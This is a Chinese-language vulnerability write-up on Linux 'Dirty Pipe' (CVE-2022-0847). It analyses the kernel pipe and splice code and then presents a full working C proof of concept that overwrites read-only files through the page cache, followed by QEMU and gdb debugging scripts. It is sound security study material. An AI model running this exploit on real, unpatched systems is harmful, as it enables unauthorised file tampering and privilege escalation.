CVE-2022-0847: "dirty pipe" 变量未初始化引发的越权写文件

脏脏的管道，破破的exp

[toc]

CVE-2022-0847: “dirty pipe” 变量未初始化引发的越权写文件

0x00. 总结

CVE编号：CVE-2022-0847
受影响linux版本：5.8 及之后的版本；已在 5.16.11、5.15.25 和 5.10.102 中修复
成因：splice 实现零拷贝的过程中，将文件的缓存页添加到pipe_buffer时，未将原有flags进行初始化，导致一定情况下攻击者可以将只读文件进行越权修改。
修复：将变量初始化即可。

0x01. pipe 基础知识

pipe 系统调用 - 创建 pipe

在用户态，我们可以创建管道来实现进程间通信。当在用户态下调用pipe时，会经过如下系统调用：

/* pipe2(2) entry point: forwards the caller-supplied flags to do_pipe2(). */
SYSCALL_DEFINE2(pipe2, int __user *, fildes, int, flags)
{
	return do_pipe2(fildes, flags);
}

/* pipe(2) entry point: same path as pipe2(2), but always passes flags = 0. */
SYSCALL_DEFINE1(pipe, int __user *, fildes)
{
	return do_pipe2(fildes, 0);
}

其中，pipe和pipe2两个系统调用的唯一区别在于是否向do_pipe2函数传入用户指定的flags（如O_CLOEXEC、O_NONBLOCK、O_DIRECT），此外没有区别。需要注意的是，二者创建的都是“匿名管道”；“有名管道”（FIFO）是通过mkfifo/mknod创建的，与pipe2无关。我们此处主要关注pipe相关。

跟进系统调用，可以得到其函数调用链如下：

do_pipe2() // 返回给用户
    __do_pipe_flags() // 获取 read 和 write 的文件描述符
    	create_pipe_files() // 对下层调用得到的 inode 进行属性配置
    		get_pipe_inode() // 对下层调用得到的 pipe_inode_info 结构体进行配置
    			alloc_pipe_info() // 核心部分

我们分析alloc_pipe_info部分，其源码如下所示：

/*
 * Allocate a pipe_inode_info together with its ring of pipe_buffer slots.
 *
 * Returns the initialised pipe on success, or NULL when either allocation
 * fails or the per-user hard buffer limit is exceeded. On failure the buffer
 * accounting and the user reference taken here are released again.
 */
struct pipe_inode_info *alloc_pipe_info(void)
{
	struct pipe_inode_info *pipe;
	unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
	struct user_struct *user = get_current_user();
	unsigned long user_bufs;
	unsigned int max_size = READ_ONCE(pipe_max_size);
	
	/*
	 * Zeroed allocation of the pipe_inode_info with GFP_KERNEL_ACCOUNT.
	 * The article reports a size of about 0x88 bytes - depends on the
	 * kernel config, TODO confirm.
	 */
	pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
	if (pipe == NULL)
		goto out_free_uid;
	
	/*
	 * The default ring would exceed pipe_max_size: callers without
	 * CAP_SYS_RESOURCE get the slot count clamped to that limit.
	 */
	if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE))
		pipe_bufs = max_size >> PAGE_SHIFT;

	user_bufs = account_pipe_buffers(user, 0, pipe_bufs);

	/* Soft limit hit by an unprivileged user: shrink to the minimum ring. */
	if (too_many_pipe_buffers_soft(user_bufs) && pipe_is_unprivileged_user()) {
		user_bufs = account_pipe_buffers(user, pipe_bufs, PIPE_MIN_DEF_BUFFERS);
		pipe_bufs = PIPE_MIN_DEF_BUFFERS;
	}
	
	/* Hard limit hit by an unprivileged user: give up. */
	if (too_many_pipe_buffers_hard(user_bufs) && pipe_is_unprivileged_user())
		goto out_revert_acct;
	
	/*
	 * Allocate the array of pipe_buffer slots with GFP_KERNEL_ACCOUNT.
	 * kcalloc() returns zeroed memory, so every slot starts with flags == 0.
	 * Per the article the default is 16 slots of 0x28 bytes each, which
	 * lands in kmalloc-1024 - TODO confirm for the kernel in use.
	 */
	pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
			     GFP_KERNEL_ACCOUNT);
	
	/* Slot array allocated: finish initialising the pipe and return it. */
	if (pipe->bufs) {
		init_waitqueue_head(&pipe->rd_wait);
		init_waitqueue_head(&pipe->wr_wait);
		pipe->r_counter = pipe->w_counter = 1;
		pipe->max_usage = pipe_bufs;
		pipe->ring_size = pipe_bufs;
		pipe->nr_accounted = pipe_bufs;
		pipe->user = user;
		mutex_init(&pipe->mutex);
		return pipe;
	}

	/* Failure paths: undo the buffer accounting, then drop the user ref. */
out_revert_acct:
	(void) account_pipe_buffers(user, pipe_bufs, 0);
	kfree(pipe);
out_free_uid:
	free_uid(user);
	return NULL;
}

能看到与pipe相关的两个最重要的结构体为pipe_inode_info和pipe_buffer，其中：（直接用了breeeze师傅的注释）：

/* Per-pipe bookkeeping: owns the ring of pipe_buffer slots in @bufs. */
struct pipe_inode_info {
	struct mutex mutex;
	wait_queue_head_t rd_wait, wr_wait;
	unsigned int head; // ring index of the next slot to be written (producer side)
	unsigned int tail; // ring index of the next slot to be read (consumer side)
	unsigned int max_usage; // maximum number of ring slots that may be in use (a slot count, not bytes)
	unsigned int ring_size; // number of slots in the pipe_buffer ring
#ifdef CONFIG_WATCH_QUEUE
	bool note_loss;
#endif
	unsigned int nr_accounted; // slots charged to the user by alloc_pipe_info()
	unsigned int readers; // number of readers of this pipe
	unsigned int writers; // number of writers to this pipe
	unsigned int files;
	unsigned int r_counter;
	unsigned int w_counter;
	struct page *tmp_page; // spare page that pipe_write() keeps for its next new buffer
	struct fasync_struct *fasync_readers;
	struct fasync_struct *fasync_writers;
	struct pipe_buffer *bufs; // array of pipe_buffer slots (16 by default per the article)
	struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
	struct watch_queue *watch_queue;
#endif
};

可以看到其管理了16个pipe_buffer（默认情况下）。而这些pipe_buffer则组成了一个循环队列，如下所示：

在这里插入图片描述

其中pipe->head指向用户write的地方，而pipe->tail则指向用户read的地方，指针都是不断增长的。

其中，读写操作发生在pipe_buffer指向的page中，pipe_buffer的定义如下：

/* One slot of the pipe ring; describes the data held in a single page. */
struct pipe_buffer {
	struct page *page; // the page this slot refers to (one page per slot)
	unsigned int offset, len; // start offset and length of the valid data inside the page
	const struct pipe_buf_operations *ops; // operations table for this buffer
	// Per-buffer flag bits. PIPE_BUF_FLAG_CAN_MERGE means later writes may
	// append to this buffer's page instead of taking a new slot.
	unsigned int flags; 
	unsigned long private;
};

其除了指向page结构体，即用来读写数据的缓存区域外，还包含当前buffer的偏移和长度。而ops是一个结构体指针，其指向一个函数表，接触过linux kernel pwn的同学应该并不陌生，其可以被覆盖后用于劫持程序控制流。

而还有一个标志位flags，其中表示当前指向的缓冲区的一些属性，其中PIPE_BUF_FLAG_CAN_MERGE属性是今天的主角，表示当前页是否可以续写。此处先按下不表。

总的来说，我们了解到：

用户态调用pipe创建管道时，会得到一个pipe_inode_info结构体表示当前管道的基本信息，以及16个pipe_buffer结构体，其有一个指向缓冲区的page指针，以及当前缓冲区的一些基本信息。
16个pipe_buffer结构体组成一个环形队列，其中pipe_inode_info中的head和tail分别记录其指向的写和读的区域。

pipe 系统调用 - write 写

当我们调用write向pipe中写数据时，其最终会调用到pipe_write，其主要逻辑部分如下：

/*
 * pipe_write - write path of a pipe (abridged excerpt; "..." marks code the
 * article left out).
 *
 * First tries to append the trailing partial page of the request to the most
 * recently filled buffer when that buffer has PIPE_BUF_FLAG_CAN_MERGE set,
 * then places the remaining data into fresh ring slots, one page per slot.
 * Returns the number of bytes written or a negative error code.
 */
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
	struct file *filp = iocb->ki_filp;
	struct pipe_inode_info *pipe = filp->private_data;
	unsigned int head;
	ssize_t ret = 0;
	size_t total_len = iov_iter_count(from);
	ssize_t chars;
	bool was_empty = false;
	bool wake_next_writer = false;

	/* Null write succeeds. */
	if (unlikely(total_len == 0))
		return 0;
	...

	head = pipe->head; // current write index of the ring
	was_empty = pipe_empty(head, pipe->tail); // was the pipe (not a single page) empty before this write?
	chars = total_len & (PAGE_SIZE-1); // size of the trailing partial page: total_len modulo PAGE_SIZE
    
	/*
	 * There is a partial page to write and the pipe already holds data:
	 * consider appending to the most recently filled slot (head - 1).
	 */
	if (chars && !was_empty) {
		unsigned int mask = pipe->ring_size - 1;
		struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
		int offset = buf->offset + buf->len;
		
		/*
		 * Append only when that buffer is flagged PIPE_BUF_FLAG_CAN_MERGE
		 * and the extra bytes still fit inside its page.
		 */
		if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
		    offset + chars <= PAGE_SIZE) {
			ret = pipe_buf_confirm(pipe, buf);
			if (ret)
				goto out;
			
			/* Copy the user data into the existing page right after its current contents. */
			ret = copy_page_from_iter(buf->page, offset, chars, from);
			if (unlikely(ret < chars)) {
				ret = -EFAULT;
				goto out;
			}

			buf->len += ret;
			if (!iov_iter_count(from))
				goto out;
		}
	}
	
	/* No merge was possible, or data remains: write it into new slots. */
	for (;;) {
		if (!pipe->readers) {
			send_sig(SIGPIPE, current, 0);
			if (!ret)
				ret = -EPIPE;
			break;
		}
	
		/* The ring still has a free slot. */
		head = pipe->head;
		if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
			unsigned int mask = pipe->ring_size - 1;
			struct pipe_buffer *buf = &pipe->bufs[head & mask];
			struct page *page = pipe->tmp_page; // spare page cached on the pipe, if any
			int copied;
			
			/* No spare page cached: allocate one and remember it. */
			if (!page) {
				page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
				if (unlikely(!page)) {
					ret = ret ? : -ENOMEM;
					break;
				}
				pipe->tmp_page = page;
			}

			/* Allocate a slot in the ring in advance and attach an
			 * empty buffer.  If we fault or otherwise fail to use
			 * it, either the reader will consume it or it'll still
			 * be there for the next write.
			 */
			spin_lock_irq(&pipe->rd_wait.lock);
			
			head = pipe->head;
			if (pipe_full(head, pipe->tail, pipe->max_usage)) {
				spin_unlock_irq(&pipe->rd_wait.lock);
				continue;
			}

			pipe->head = head + 1;
			spin_unlock_irq(&pipe->rd_wait.lock);

			/* Insert it into the buffer array */
			buf = &pipe->bufs[head & mask];
			buf->page = page;
			buf->ops = &anon_pipe_buf_ops;
			buf->offset = 0;
			buf->len = 0;
			if (is_packetized(filp)) // not taken by default per the article - is_packetized() is not shown here, TODO confirm
				buf->flags = PIPE_BUF_FLAG_PACKET;
			else
				buf->flags = PIPE_BUF_FLAG_CAN_MERGE; // ordinary writes mark every new buffer as mergeable
			pipe->tmp_page = NULL;
			
			/* Copy up to one page of user data into the new page. */
			copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
			if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
				if (!ret)
					ret = -EFAULT;
				break;
			}
			ret += copied;
			buf->offset = 0;
			buf->len = copied;

			if (!iov_iter_count(from))
				break;
		}

		...
	return ret;
}

上面代码部分为pipe_write主要的写逻辑，其中：

每个要写的pipe_buffer的页面默认都设置为PIPE_BUF_FLAG_CAN_MERGE，即可以续写
再次写入时，若可以续写的页面不为空，且足够容纳用户数据，则在续写的页面进行续写

0x02. splice “零拷贝” 基础知识

splice能够在两个文件描述符之间传输数据，其函数原型如下：

ssize_t splice(int fd_in, loff_t *off_in, 
               int fd_out, loff_t *off_out, 
               size_t len, unsigned int flags);

其中分别可以指定输入输出文件描述符和偏移，以及长度、标志位。这不难让我们想到sendfile系统调用。但splice系统调用有如下特性：

适用于管道：splice只能在至少有一个文件描述符是管道的情况下才能使用。
零拷贝：数据直接在内核空间传输，无需拷贝到用户空间，提升效率。

对于”零拷贝”，试想场景如下：

read(3, buf, 0x20);
write(pipe_fd[1], buf, 0x20);

可以看到该过程需要将数据先读取到用户态下的buf变量中。使用零拷贝的splice则规避了这一点，提升了效率。

而splice实现的原理如下：

即，splice直接将打开的文件映射的page直接放到pipe的缓存页中。

这是因为在linux内核中，为了提升效率，缓存的页会保存一段时间，最近若再有访问到该页的时则可以避免不必要的IO操作。因此，在使用splice零拷贝时，其原理就是将打开的文件的页的缓存页面直接挂入pipe的页面中，若其上有读写操作则直接对该页面进行操作，而不是使用pipe本身的page进行一个中间的过渡。

从源码角度分析一下，其函数调用链如下：

__do_splice()
    do_splice()
    	...
    		copy_page_to_iter_pipe() // 主要过程

这段代码如下：

// linux kernel 5.16.10 /lib/iov_iter.c:384
/*
 * Attach @page (with @bytes of data starting at @offset) to the pipe behind
 * iterator @i without copying the data. Returns the number of bytes attached,
 * or 0 when nothing could be done.
 *
 * NOTE: in this (vulnerable) version the slot's ops, page, offset and len are
 * assigned, but buf->flags is never written, so whatever flags the slot held
 * from earlier use stay in place.
 */
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
			 struct iov_iter *i)
{
	struct pipe_inode_info *pipe = i->pipe;
	struct pipe_buffer *buf;
	unsigned int p_tail = pipe->tail;
	unsigned int p_mask = pipe->ring_size - 1;
	unsigned int i_head = i->head;
	size_t off;
	
	/* Never attach more than the iterator still has room for. */
	if (unlikely(bytes > i->count))
		bytes = i->count;
	
	/* Zero-length request: nothing to do. */
	if (unlikely(!bytes))
		return 0;

	if (!sanity(i))
		return 0;
	
	off = i->iov_offset; // when this is 0 the merge branch below is skipped
	buf = &pipe->bufs[i_head & p_mask]; // slot at the iterator's current head
	if (off) {
		if (offset == off && buf->page == page) {
			/* merge with the last one */
			buf->len += bytes;
			i->iov_offset += bytes;
			goto out;
		}
		i_head++;
		buf = &pipe->bufs[i_head & p_mask];
	}
	/* A full pipe cannot take another buffer. */
	if (pipe_full(i_head, p_tail, pipe->max_usage))
		return 0;
	
	/* The slot now uses the page-cache buffer operations. */
	buf->ops = &page_cache_pipe_buf_ops;
	get_page(page); // presumably takes a reference so the page is not freed while the pipe points at it - get_page() is not shown here
	buf->page = page; // the slot now points at the file's page-cache page
	buf->offset = offset;
	buf->len = bytes;

	pipe->head = i_head + 1;
	i->iov_offset = offset + bytes;
	i->head = i_head;
out:
	i->count -= bytes;
	return bytes;
}

0x03. 漏洞成因

上面已经提到splice的原理。而splice调用的copy_page_to_iter_pipe函数中：

static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by
 		return 0;
 
 	buf->ops = &page_cache_pipe_buf_ops;
	// buf->flags = 0; // 修复的时候才加上的
 	get_page(page);
 	buf->page = page;
 	buf->offset = offset;

可以看到这里没有对挂入文件缓存页后的pipe_buffer结构体中的flags进行初始化（清空）。

因此，若原本pipe_buffer结构体中flags标志位带有PIPE_BUF_FLAG_CAN_MERGE标志，则不会被清空。

此时若再对pipe调用一次write来写数据，则会进入如下分支：

head = pipe->head; // head is now one past the slot that holds the spliced page-cache page
was_empty = pipe_empty(head, pipe->tail); // false: the spliced buffer is still queued
chars = total_len & (PAGE_SIZE-1); // bytes to write; non-zero unless the length is a multiple of PAGE_SIZE
if (chars && !was_empty) {
    unsigned int mask = pipe->ring_size - 1;
    struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
    int offset = buf->offset + buf->len;
	
    // The flag is stale: every slot received it while the pipe was filled and
    // drained, and attaching the file page did not clear it.
    // So this branch is taken and the write is appended to the file's page.
    if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
        offset + chars <= PAGE_SIZE) {
        ret = pipe_buf_confirm(pipe, buf);
        if (ret)
            goto out;
		
        // Copies the caller's data into the page-cache page: the unauthorised write.
        ret = copy_page_from_iter(buf->page, offset, chars, from);
        if (unlikely(ret < chars)) {
            ret = -EFAULT;
            goto out;
        }

        buf->len += ret;
        if (!iov_iter_count(from))
            goto out;
    }
}

0x04. 漏洞利用：编写poc

按照上述漏洞来编写exp，大致流程如下：

打开待覆写文件，从而让文件的缓存页留在内存中
建立管道，计算管道的大小，向管道写数据填满管道
从管道读数据清空管道，此时每一个管道中的pipe_buffer都被写上了PIPE_BUF_FLAG_CAN_MERGE位
调用splice零拷贝，从而将文件的缓存页挂入pipe_buffer，但flag未清空
再次向管道写数据，触发漏洞，向文件缓存页进行续写

#include "ltfallkernel.h"
#include <sys/stat.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 0x1000
#endif

/*
 * Dirty Pipe (CVE-2022-0847) proof of concept.
 *
 * Usage: <prog> TARGET_FILE OFFSET DATA
 *
 * Overwrites DATA into the page cache of TARGET_FILE starting at OFFSET,
 * although the file is only opened read-only. Constraints checked below:
 * OFFSET must not sit on a page boundary, the write must not cross a page
 * boundary, and the file cannot be enlarged.
 *
 * Returns 0 on success; every failure path terminates with a failure status.
 * error(), err_exit() and success() come from ltfallkernel.h; err_exit() is
 * assumed to terminate the process, as the original code relied on.
 */
int main(int argc, char **argv)
{
    if (argc != 4)
    {
        error("Usage: %s [TARGET_FILE] [OFFSET] [DATA].", argv[0]);
        exit(EXIT_FAILURE);
    }

    int pipe_fd[2];

    const char *const path = argv[1];
    const char *const data = argv[3];
    const size_t data_size = strlen(data);

    /* Reject empty, non-numeric or negative offsets instead of silently using 0. */
    char *end = NULL;
    const long long parsed = strtoll(argv[2], &end, 0);
    if (end == argv[2] || *end != '\0' || parsed < 0)
    {
        error("Invalid OFFSET: %s.", argv[2]);
        exit(EXIT_FAILURE);
    }

    /* splice() takes a loff_t *, so keep the offset in that exact type. */
    loff_t offset = (loff_t)parsed;

    /* The write cannot start on the first byte of a page. */
    if (offset % PAGE_SIZE == 0)
    {
        err_exit("Writing at a page boundary is NOT ALLOWED.");
    }

    /* The write cannot cross into the next page. */
    const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1; /* start of the following page */
    const loff_t end_offset = offset + (loff_t)data_size;    /* one past the last byte written */
    if (end_offset > next_page)
    {
        err_exit("Writing across a page boundary is NOT ALLOWED.");
    }

    /* Open the target read-only and validate offset and length against its size. */
    const int fd = open(path, O_RDONLY);
    if (fd < 0)
    {
        error("Failed to open the TARGET file: %s.", path);
        exit(EXIT_FAILURE);
    }

    struct stat st;
    if (fstat(fd, &st))
    {
        err_exit("Failed to fstat.");
    }
    if (offset > st.st_size)
    {
        error("Offset %lld larger than the file size is NOT ALLOWED.", (long long)offset);
        exit(EXIT_FAILURE);
    }
    if (end_offset > st.st_size)
    {
        /* Must stop here: continuing would attempt a write past EOF. */
        error("CANNOT enlarge the TARGET file.");
        exit(EXIT_FAILURE);
    }

    /* Create the pipe. */
    if (pipe(pipe_fd) < 0)
    {
        err_exit("Failed to create pipe.");
    }

    /* Query the pipe capacity; -1 must not be used as a byte count. */
    const int pipe_capacity = fcntl(pipe_fd[1], F_GETPIPE_SZ);
    if (pipe_capacity < 0)
    {
        err_exit("Failed to get the pipe size.");
    }
    const unsigned int pipe_size = (unsigned int)pipe_capacity;
    static char buffer[0x1000];

    /* Fill the pipe completely so that every slot gets PIPE_BUF_FLAG_CAN_MERGE. */
    unsigned int r = pipe_size;
    while (r > 0)
    {
        unsigned int n = r > sizeof(buffer) ? sizeof(buffer) : r;
        const ssize_t written = write(pipe_fd[1], buffer, n);
        if (written <= 0)
        {
            err_exit("Failed to fill the pipe.");
        }
        r -= (unsigned int)written;
    }

    /* Drain the pipe again; the slots are released but their flags remain. */
    r = pipe_size;
    while (r > 0)
    {
        unsigned int n = r > sizeof(buffer) ? sizeof(buffer) : r;
        const ssize_t got = read(pipe_fd[0], buffer, n);
        if (got <= 0)
        {
            err_exit("Failed to drain the pipe.");
        }
        r -= (unsigned int)got;
    }

    /*
     * Splice the single byte just before the target offset into the pipe.
     * The page-cache page is attached to a slot whose stale flag still
     * allows merging, so the following write lands in that page.
     */
    --offset;
    ssize_t nbytes = splice(fd, &offset, pipe_fd[1], NULL, 1, 0);
    if (nbytes < 0)
    {
        err_exit("splice failed.");
    }

    if (nbytes == 0)
    {
        err_exit("Too short to splice.");
    }

    nbytes = write(pipe_fd[1], data, data_size);
    if (nbytes < 0)
    {
        err_exit("write failed.");
    }

    if ((size_t)nbytes < data_size)
    {
        err_exit("short write.");
    }

    success("All writes done.");
    return 0;
}

0x05. 调试分析

这里我自己编译了linux 5.16.10版本的代码，常见保护全开。

qemu启动脚本如下（现在关闭kaslr以便于调试，运行exp时应该开启）：

#!/bin/sh
# Boot the test kernel under QEMU for debugging the exploit.
# - 128M of RAM, kernel ./bzImage, initramfs ./rootfs.cpio, no graphical display.
# - SMEP and SMAP are enabled on the CPU model; "nokaslr" on the kernel command
#   line keeps addresses fixed for debugging (remove it for a realistic run).
# - "-s" presumably exposes the gdb stub on TCP port 1234, the port the gdb
#   script connects to - confirm against the QEMU documentation.
qemu-system-x86_64 \
    -m 128M \
    -kernel ./bzImage \
    -initrd  ./rootfs.cpio \
    -monitor /dev/null \
    -append "root=/dev/ram rdinit=/sbin/init console=ttyS0 oops=panic panic=1 loglevel=3 quiet nokaslr" \
    -cpu kvm64,+smep,+smap \
    -smp cores=2,threads=1 \
    -nographic \
    -s

使用调试脚本如下：

#!/bin/bash
# Start gdb with the symbols of both the kernel image and the exploit binary,
# then connect to the remote gdb stub on $PORT.

KERNEL_MODULE="vmlinux"
PORT="1234"
EXPLOIT="core/exploit"

# Fixed: the second command was misspelled "add-symbole-file", which gdb
# rejects as an undefined command, so the exploit's symbols were never added.
gdb -q \
    -ex "add-symbol-file $KERNEL_MODULE" \
    -ex "add-symbol-file $EXPLOIT" \
    -ex "file $KERNEL_MODULE" \
    -ex "file $EXPLOIT" \
    -ex "target remote:$PORT"

启动内核，运行调试脚本，先暂停到exp经过splice后，触发漏洞的write的行，我这里是101：

随后，运行脚本：

下断点到pipe_write，并使用dir，添加源码路径：

运行程序，暂停到pipe_write：

使用b pipe.c:458，下断点到458行：

查看pipe_buf[0]，发现已经挂入了缓存文件page的物理页，并且即将进入下面的分支执行：

可以根据ops看出pipe_bufs[0]即为文件缓存页面的page，且flags=16，即为PIPE_BUF_FLAG_CAN_MERGE的值。

0x06. Q&A

- 为什么`PIPE_BUF_FLAG_CAN_MERGE`未初始化会影响到文件本身的`page`？

笔者的疑问。这是因为实际上这个标志位是位于pipe_buffer结构体上的，而将文件缓存页挂入时，实际上也是挂入了pipe_buffer的page指针中。因此该pipe_buffer上的PIPE_BUF_FLAG_CAN_MERGE标志位仍然保留。

- 漏洞利用时为什么需要将管道填满再清空？

笔者刚开始看到这个漏洞的时候有这个疑问，为什么不简单的在当前页面写一字节数据，如此便可以使得当前页面就有PIPE_BUF_FLAG_CAN_MERGE标志了，就可以触发dirty pipe漏洞。那么为什么还要先填满管道再清空呢？

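经过调试可以发现，splice将文件缓存页挂入管道时，使用的是head当前指向的那个新的pipe_buffer槽位（随后head再加1），而不是之前write写过的那个槽位。因此，若只是先写入1字节，带有PIPE_BUF_FLAG_CAN_MERGE标志的是被写过的那个槽位；而文件缓存页挂入的是下一个从未使用过的槽位，其flags仍为kcalloc分配时的0。之后再调用pipe_write时，挂着文件缓存页的pipe_buffer上没有PIPE_BUF_FLAG_CAN_MERGE标志，就无法再触发漏洞越权写了。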

因此，需要先填满再清空pipe，如此，每一页都会挂上PIPE_BUF_FLAG_CAN_MERGE标志。~~感觉有点漏洞百出了~~（👈你行你写内核）